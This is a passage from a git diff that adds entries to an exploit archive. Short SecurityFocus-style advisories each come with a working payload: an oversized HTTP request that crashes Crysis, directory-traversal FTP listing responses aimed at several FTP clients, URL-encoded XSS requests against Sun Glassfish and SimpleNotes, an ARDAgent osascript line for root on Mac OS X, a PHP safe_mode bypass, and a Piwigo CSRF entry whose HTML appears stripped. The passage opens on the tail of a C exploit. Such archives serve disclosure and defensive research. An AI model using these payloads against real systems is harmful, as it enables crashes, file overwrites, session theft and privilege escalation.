FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + if(select(sock + 1, &fd_read, NULL, NULL, &tout) + <= 0) return(-1); + return(0); +} + + + +u32 resolv(char *host) { + struct hostent *hp; + u32 host_ip; + + host_ip = inet_addr(host); + if(host_ip == INADDR_NONE) { + hp = gethostbyname(host); + if(!hp) { + printf("\nError: Unable to resolv hostname (%s)\n", host); + exit(1); + } else host_ip = *(u32 *)hp->h_addr; + } + return(host_ip); +} + + + +#ifndef WIN32 + void std_err(void) { + perror("\nError"); + exit(1); + } +#endif + + + diff --git a/platforms/multiple/dos/31931.txt b/platforms/multiple/dos/31931.txt new file mode 100755 index 000000000..5ea84f579 --- /dev/null +++ b/platforms/multiple/dos/31931.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29759/info + +Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. + +An attacker can exploit this issue to crash the affected application, denying further service to legitimate users. + +Crysis 1.21 is vulnerable; other versions may also be affected. + +GET / HTTP/1.0 +Content-Length: 0 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa + diff --git a/platforms/multiple/dos/31932.txt b/platforms/multiple/dos/31932.txt new file mode 100755 index 000000000..d9e7c4eae --- /dev/null +++ b/platforms/multiple/dos/31932.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29760/info + +Skulltag is prone to a vulnerability that can cause denial-of-service conditions. + +A successful attack will deny service to legitimate users. + +Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/31932.zip \ No newline at end of file diff --git a/platforms/multiple/remote/31918.txt b/platforms/multiple/remote/31918.txt new file mode 100755 index 000000000..c4f022dd9 --- /dev/null +++ b/platforms/multiple/remote/31918.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29720/info + +Crysis is prone to an information-disclosure vulnerability caused by a design error. + +Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. + +Crysis 1.21 and prior versions are affected. + +http://www.exploit-db.com/sploits/31918.zip \ No newline at end of file diff --git a/platforms/multiple/remote/31920.txt b/platforms/multiple/remote/31920.txt new file mode 100755 index 000000000..cb2cd0e70 --- /dev/null +++ b/platforms/multiple/remote/31920.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29741/info + +Glub Tech Secure FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client. + +Exploiting these issues will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks. + +Secure FTP 2.5.15 for Microsoft Windows is vulnerable; other versions may also be affected. + +Response to LIST: + +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31921.txt b/platforms/multiple/remote/31921.txt new file mode 100755 index 000000000..c4558f003 --- /dev/null +++ b/platforms/multiple/remote/31921.txt @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/29749/info + +3D-FTP is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input data. + +Exploiting these issues allows an attacker to write arbitrary files to locations outside of the FTP client's current directory. This could help the attacker launch further attacks. + +3D-FTP 8.01 is vulnerable; other versions may also be affected. + +The following example responses are available: +Response to LIST (backslash): +-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n + +Response to LIST (forward-slash): +-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n + +Response to LIST (combination): +-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n + +Response to MLSD (backslash): +type=file;modify=20080227074710;size=20; \..\..\..\..\..\..\..\..\..\testfile.txt\r\n + +Response to MLSD (forward-slash): +type=file;modify=20080227074710;size=20; /../../../../../../../../../testfile.txt\r\n + +Response to MLSD (combination): +type=file;modify=20080227074710;size=20; ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31922.txt b/platforms/multiple/remote/31922.txt new file mode 100755 index 000000000..a1a859fb7 --- /dev/null +++ b/platforms/multiple/remote/31922.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper +tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage +%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer +t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty +Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x +ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A +propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2 +7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet% +3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B% +3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti +onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou +rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_ +id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr +opertyContentPage%3AtopButtons%3AnewButton \ No newline at end of file diff --git a/platforms/multiple/remote/31923.txt b/platforms/multiple/remote/31923.txt new file mode 100755 index 000000000..51fe94bc6 --- /dev/null +++ b/platforms/multiple/remote/31923.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope +rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag +e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale +rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert +ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27 +xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3 +ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28% +27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet +%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27 +xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3 +ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3 +C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio +nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage% +3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j +avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem +entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton \ No newline at end of file diff --git a/platforms/multiple/remote/31924.txt b/platforms/multiple/remote/31924.txt new file mode 100755 index 000000000..d566a8bc2 --- /dev/null +++ b/platforms/multiple/remote/31924.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert +yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop +ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs +cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam +e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee +t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm +%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2 +8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex +tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3 +Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p +ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm +_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_ +focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton \ No newline at end of file diff --git a/platforms/multiple/remote/31925.txt b/platforms/multiple/remote/31925.txt new file mode 100755 index 000000000..dcbc65de6 --- /dev/null +++ b/platforms/multiple/remote/31925.txt @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty +ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener +alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip +t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType +=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty +Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper +tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true& +propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p +ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope +rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert +yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo +rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property +Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo +rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab +le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3 +A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac +ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro +pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu +sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons% \ No newline at end of file diff --git a/platforms/multiple/remote/31926.txt b/platforms/multiple/remote/31926.txt new file mode 100755 index 000000000..cf2f95cb3 --- /dev/null +++ b/platforms/multiple/remote/31926.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC +ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper +tSectionTextField%3AjndiProp%3Ajnditext=&propertyF +orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl +owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc= +&propertyForm%3ApropertySheet%3ApropertSectionTex +tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew. +html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i +d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte +ntPage%3AtopButtons%3AnewButton \ No newline at end of file diff --git a/platforms/multiple/remote/31927.txt b/platforms/multiple/remote/31927.txt new file mode 100755 index 000000000..b864d86c6 --- /dev/null +++ b/platforms/multiple/remote/31927.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope +rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=alert('xss');&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap +ropertSectionTextField%3AclassNameProp%3Aclassname= +&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A +descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec +tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa +ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules. +html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i +d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte +ntPage%3AbottomButtons%3AsaveButton2 \ No newline at end of file diff --git a/platforms/multiple/remote/31928.txt b/platforms/multiple/remote/31928.txt new file mode 100755 index 000000000..e9adf4403 --- /dev/null +++ b/platforms/multiple/remote/31928.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/29751/info + +Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr +opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten +tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert +ySheet%3AresTypeProp%3AresType=&propertyForm%3Apr +opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper +tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w +ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu +ttons%3AnextButton \ No newline at end of file diff --git a/platforms/multiple/remote/31936.txt b/platforms/multiple/remote/31936.txt new file mode 100755 index 000000000..bc18774a0 --- /dev/null +++ b/platforms/multiple/remote/31936.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/29784/info + +UltraEdit is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP/SFTP client. + +Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks. + +UltraEdit 14.00b is vulnerable; other versions may also be affected. + +Response to LIST (backslash): + +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n + +Response to LIST (forward-slash): +/../../../../../../../../../testfile.txt\r\n + +Response to LIST (backslash and forward-slash): +../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31941.txt b/platforms/multiple/remote/31941.txt new file mode 100755 index 000000000..d48edc918 --- /dev/null +++ b/platforms/multiple/remote/31941.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29844/info + +WISE-FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks. + +Versions prior to WISE-FTP 5.5.9 are vulnerable. + +Response to LIST: + +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31942.txt b/platforms/multiple/remote/31942.txt new file mode 100755 index 000000000..4d7f82cca --- /dev/null +++ b/platforms/multiple/remote/31942.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29846/info + +Classic FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks. + +Classic FTP 1.02 for Microsoft Windows is vulnerable; other versions may also be affected. + +Response to LIST: + +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n +/../../../../../../../../../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/osx/local/31940.txt b/platforms/osx/local/31940.txt new file mode 100755 index 000000000..a30a6ad20 --- /dev/null +++ b/platforms/osx/local/31940.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29831/info + +Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop). + +Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer. + +This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable. + +osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; \ No newline at end of file diff --git a/platforms/php/local/31937.txt b/platforms/php/local/31937.txt new file mode 100755 index 000000000..661294424 --- /dev/null +++ b/platforms/php/local/31937.txt @@ -0,0 +1,45 @@ +source: http://www.securityfocus.com/bid/29796/info + +PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. + +Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks. + +These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other. + +PHP 5.2.6 is vulnerable; other versions may also be affected. + +cxib# cat /www/wufff.php + +cxib# ls -la /www/wufff.php +-rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php +cxib# php /www/wufff.php +/www + +Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid +is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on +line 3 +/www +cxib# +---/EXAMPLE1--- + +---EXAMPLE2--- +cxib# ls -la /www/wufff.php +-rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php +cxib# ls -la /www/http: +total 8 +drwxr-xr-x 2 www www 512 Jun 17 17:12 . +drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. +cxib# cat /www/wufff.php + +cxib# php /www/wufff.php +/www +/etc +cxib# diff --git a/platforms/php/webapps/31916.txt b/platforms/php/webapps/31916.txt new file mode 100755 index 000000000..1b094cb5b --- /dev/null +++ b/platforms/php/webapps/31916.txt @@ -0,0 +1,33 @@ +# Exploit Title: piwigo 2.6.1 - CSRF +# Date: 26/02/2014 +# Exploit Author: killall-9@mail.com +# Vendor Homepage: http://it.piwigo.org/ +# Software Link: http://it.piwigo.org/basics/downloads +# Version: 2.6.1 +# Tested on: Virtualbox debian + +A CSRF problem is present in the administration panel. +Here it is a POF according to a derived POST: + + + + +Piwigo 2.6.1 + + +
    + + + + +
    + + + + +So you can add a new arbitrary user. + + +cheerz°°°° diff --git a/platforms/php/webapps/31929.txt b/platforms/php/webapps/31929.txt new file mode 100755 index 000000000..f8c8327f1 --- /dev/null +++ b/platforms/php/webapps/31929.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/29755/info + +SimpleNotes is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/path/snoteindex.php?RootID=[XSS] +http://www.example.com/path/snoteindex.php?RootID=> +http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=[XSS] +http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=> +http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS] +http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=> 